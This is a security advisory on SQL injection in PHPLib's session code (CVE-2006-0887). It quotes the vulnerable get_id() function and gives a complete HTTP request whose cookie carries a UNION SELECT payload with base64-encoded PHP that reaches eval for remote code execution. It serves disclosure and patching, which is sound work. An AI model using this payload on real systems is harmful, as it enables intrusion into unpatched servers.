PHPLib SQL Injection
Vendor: PHPLib
Product: PHPLib
Version: <= 7.4
Website: http://phplib.sourceforge.net/
BID: 16801
CVE: CVE-2006-0887 CVE-2006-2826
OSVDB: 23466
SECUNIA: 16902
Description:
The PHP Base Library aka PHPLib is a toolkit for PHP developers supporting them in the development of Web applications. The phpLib codebase can be found in a number of applications available today. Unfortunately some of the session emulation code is vulnerable to SQL Injection issues that in a worst case scenario can lead to remote code execution by using UNION and selecting arbitrary php code into an eval call. A new version og PHPLib has been released and users should upgrade their PHPLib libraries as soon as possible.


Remote Code Execution:
There are some serious security issues in phplib's session handling that may allow an attacker to perform a range of attacks such as SQL Injection, and/or Remote Code Execution.
## Propagate the session id according to mode and lifetime.
## Will create a new id if necessary. To take over abandoned sessions,
## one may provide the new session id as a parameter (not recommended).

function get_id($id = "") {
global $HTTP_COOKIE_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
$this->newid=true;

$this->name = $this->cookiename==""?$this->classname:$this->cookiename;

if ( "" == $id ) {
  $this->newid=false;
  switch ($this->mode) {
    case "get":
      $id = isset($HTTP_GET_VARS[$this->name]) ?
            $HTTP_GET_VARS[$this->name] :
            ( isset($HTTP_POST_VARS[$this->name]) ?
            $HTTP_POST_VARS[$this->name] :
            "") ;
    break;
    case "cookie":
      $id = isset($HTTP_COOKIE_VARS[$this->name]) ?
            $HTTP_COOKIE_VARS[$this->name] : "";
    break;
    default:
      die("This has not been coded yet.");
    break;
  }
}

### do not accept user provided ids for creation
if($id != "" && $this->block_alien_sid) {   # somehow an id was provided by the user
   if($this->that->ac_get_value($id, $this->name) == "") {
      # no - the id doesn't exist in the database: Ignore it!
      $id = "";
   }
}

The above code is from sessions.inc @ lines 85-121. The variable $id gets it's values from either GET or COOKIE and is never made safe before being passed to the function ac_get_value() which uses the variable in a query, thus allowing for SQL Injection. However, it is possible to manipulate the query in a way that php code is returned and passed to a vulnerable eval call.
GET /phplib/pages/index.php3 HTTP/1.1
Host: example.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: Example_Session=' UNION SELECT 'cGhwaW5mbygpOw=='/*
If-Modified-Since: Sat, 18 Feb 2006 18:24:34 GMT
For example, the above request made to the index.php3 script that is shipped with phplib will successfully execute the phpinfo call.


Solution:
PHPLib 7.4a has been released to address these issues.


Credits:
James Bercegay of the GulfTech Security Research Team